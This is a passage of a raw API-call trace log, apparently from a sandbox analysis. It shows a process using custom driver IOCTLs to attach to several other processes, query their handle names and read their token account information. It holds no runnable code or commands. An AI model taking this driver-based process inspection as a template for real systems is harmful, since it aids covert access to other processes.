() returned 0x2 [0226.372] ObfDereferenceObject (Object=0xfffffa8001f6c060) returned 0x12 [0226.372] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.372] ObfDereferenceObject (Object=0xfffffa800dbf7df0) returned 0x1 [0226.372] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.372] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.372] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.372] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.372] PsLookupProcessByProcessId (in: ProcessId=0x90, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.372] PsAcquireProcessExitSynchronization () returned 0x0 [0226.372] KeStackAttachProcess (in: PROCESS=0xfffffa8001f6c060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f6c060, ApcState=0xfffff880052b35d0) [0226.372] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.373] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.373] PsReleaseProcessExitSynchronization () returned 0x2 [0226.373] ObfDereferenceObject (Object=0xfffffa8001f6c060) returned 0x12 [0226.373] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.373] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.373] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.373] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xc8 [0226.373] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.373] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8001fc2b30, HandleInformation=0x0) returned 0x0 [0226.373] ObOpenObjectByPointer (in: Object=0xfffffa8001fc2b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000838) returned 0x0 [0226.373] ObfDereferenceObject (Object=0xfffffa8001fc2b30) returned 0x14 [0226.373] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000838, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.373] ZwClose (Handle=0xffffffff80000838) returned 0x0 [0226.373] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.373] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.373] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.375] CloseHandle (hObject=0xc4) returned 1 [0226.375] CloseHandle (hObject=0xc8) returned 1 [0226.376] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.376] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.376] PsLookupProcessByProcessId (in: ProcessId=0x780, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.376] PsAcquireProcessExitSynchronization () returned 0x0 [0226.376] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc2b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001fc2b30, ApcState=0xfffff880052b35d0) [0226.376] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001fc2070, HandleInformation=0x0) returned 0x0 [0226.376] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.376] PsReleaseProcessExitSynchronization () returned 0x2 [0226.376] ObfDereferenceObject (Object=0xfffffa8001fc2b30) returned 0x12 [0226.376] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.376] ObfDereferenceObject (Object=0xfffffa8001fc2070) returned 0x1 [0226.376] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.377] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.377] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.377] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0226.377] PsLookupProcessByProcessId (in: ProcessId=0x780, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.377] PsAcquireProcessExitSynchronization () returned 0x0 [0226.377] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc2b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001fc2b30, ApcState=0xfffff880052b35d0) [0226.377] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020102e0, HandleInformation=0x0) returned 0x0 [0226.377] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.377] PsReleaseProcessExitSynchronization () returned 0x2 [0226.377] ObfDereferenceObject (Object=0xfffffa8001fc2b30) returned 0x12 [0226.377] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.377] ObfDereferenceObject (Object=0xfffffa80020102e0) returned 0x1 [0226.377] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.377] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.377] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.377] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.377] PsLookupProcessByProcessId (in: ProcessId=0x780, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.377] PsAcquireProcessExitSynchronization () returned 0x0 [0226.377] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc2b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001fc2b30, ApcState=0xfffff880052b35d0) [0226.377] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.377] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.377] PsReleaseProcessExitSynchronization () returned 0x2 [0226.378] ObfDereferenceObject (Object=0xfffffa8001fc2b30) returned 0x12 [0226.378] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.378] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.378] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.378] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x208) returned 0xc8 [0226.378] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.378] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa800201ea90, HandleInformation=0x0) returned 0x0 [0226.378] ObOpenObjectByPointer (in: Object=0xfffffa800201ea90, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000838) returned 0x0 [0226.378] ObfDereferenceObject (Object=0xfffffa800201ea90) returned 0x14 [0226.378] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000838, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.378] ZwClose (Handle=0xffffffff80000838) returned 0x0 [0226.378] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.378] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.378] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.380] CloseHandle (hObject=0xc4) returned 1 [0226.380] CloseHandle (hObject=0xc8) returned 1 [0226.381] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.381] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.381] PsLookupProcessByProcessId (in: ProcessId=0x208, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.381] PsAcquireProcessExitSynchronization () returned 0x0 [0226.381] KeStackAttachProcess (in: PROCESS=0xfffffa800201ea90, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800201ea90, ApcState=0xfffff880052b35d0) [0226.381] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002027c70, HandleInformation=0x0) returned 0x0 [0226.381] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.381] PsReleaseProcessExitSynchronization () returned 0x2 [0226.381] ObfDereferenceObject (Object=0xfffffa800201ea90) returned 0x12 [0226.381] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.381] ObfDereferenceObject (Object=0xfffffa8002027c70) returned 0x1 [0226.381] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.381] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.381] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.381] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0226.381] PsLookupProcessByProcessId (in: ProcessId=0x208, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.381] PsAcquireProcessExitSynchronization () returned 0x0 [0226.382] KeStackAttachProcess (in: PROCESS=0xfffffa800201ea90, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800201ea90, ApcState=0xfffff880052b35d0) [0226.382] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020279d0, HandleInformation=0x0) returned 0x0 [0226.382] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.382] PsReleaseProcessExitSynchronization () returned 0x2 [0226.382] ObfDereferenceObject (Object=0xfffffa800201ea90) returned 0x12 [0226.382] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.382] ObfDereferenceObject (Object=0xfffffa80020279d0) returned 0x1 [0226.382] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.382] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.382] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.382] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.382] PsLookupProcessByProcessId (in: ProcessId=0x208, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.382] PsAcquireProcessExitSynchronization () returned 0x0 [0226.382] KeStackAttachProcess (in: PROCESS=0xfffffa800201ea90, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800201ea90, ApcState=0xfffff880052b35d0) [0226.382] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.382] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.382] PsReleaseProcessExitSynchronization () returned 0x2 [0226.382] ObfDereferenceObject (Object=0xfffffa800201ea90) returned 0x12 [0226.382] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.382] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.383] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.383] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d4) returned 0xc8 [0226.383] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.383] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8002038b30, HandleInformation=0x0) returned 0x0 [0226.383] ObOpenObjectByPointer (in: Object=0xfffffa8002038b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000838) returned 0x0 [0226.383] ObfDereferenceObject (Object=0xfffffa8002038b30) returned 0x14 [0226.383] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000838, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.383] ZwClose (Handle=0xffffffff80000838) returned 0x0 [0226.383] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.383] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.383] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.385] CloseHandle (hObject=0xc4) returned 1 [0226.385] CloseHandle (hObject=0xc8) returned 1 [0226.385] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.385] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.385] PsLookupProcessByProcessId (in: ProcessId=0x5d4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.385] PsAcquireProcessExitSynchronization () returned 0x0 [0226.386] KeStackAttachProcess (in: PROCESS=0xfffffa8002038b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002038b30, ApcState=0xfffff880052b35d0) [0226.386] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800203ddd0, HandleInformation=0x0) returned 0x0 [0226.386] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.386] PsReleaseProcessExitSynchronization () returned 0x2 [0226.386] ObfDereferenceObject (Object=0xfffffa8002038b30) returned 0x12 [0226.386] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.386] ObfDereferenceObject (Object=0xfffffa800203ddd0) returned 0x1 [0226.386] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.386] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.386] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.386] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x92, lpOverlapped=0x0) returned 1 [0226.386] PsLookupProcessByProcessId (in: ProcessId=0x5d4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.386] PsAcquireProcessExitSynchronization () returned 0x0 [0226.386] KeStackAttachProcess (in: PROCESS=0xfffffa8002038b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002038b30, ApcState=0xfffff880052b35d0) [0226.386] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800203d9d0, HandleInformation=0x0) returned 0x0 [0226.387] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.387] PsReleaseProcessExitSynchronization () returned 0x2 [0226.387] ObfDereferenceObject (Object=0xfffffa8002038b30) returned 0x12 [0226.387] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.387] ObfDereferenceObject (Object=0xfffffa800203d9d0) returned 0x1 [0226.387] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.387] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.387] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.387] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.387] PsLookupProcessByProcessId (in: ProcessId=0x5d4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.387] PsAcquireProcessExitSynchronization () returned 0x0 [0226.387] KeStackAttachProcess (in: PROCESS=0xfffffa8002038b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002038b30, ApcState=0xfffff880052b35d0) [0226.387] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.387] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.387] PsReleaseProcessExitSynchronization () returned 0x2 [0226.387] ObfDereferenceObject (Object=0xfffffa8002038b30) returned 0x12 [0226.387] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.387] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.387] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.387] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0xc8 [0226.388] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.388] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8002046060, HandleInformation=0x0) returned 0x0 [0226.388] ObOpenObjectByPointer (in: Object=0xfffffa8002046060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000838) returned 0x0 [0226.388] ObfDereferenceObject (Object=0xfffffa8002046060) returned 0x14 [0226.388] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000838, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.388] ZwClose (Handle=0xffffffff80000838) returned 0x0 [0226.388] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.388] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.388] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", 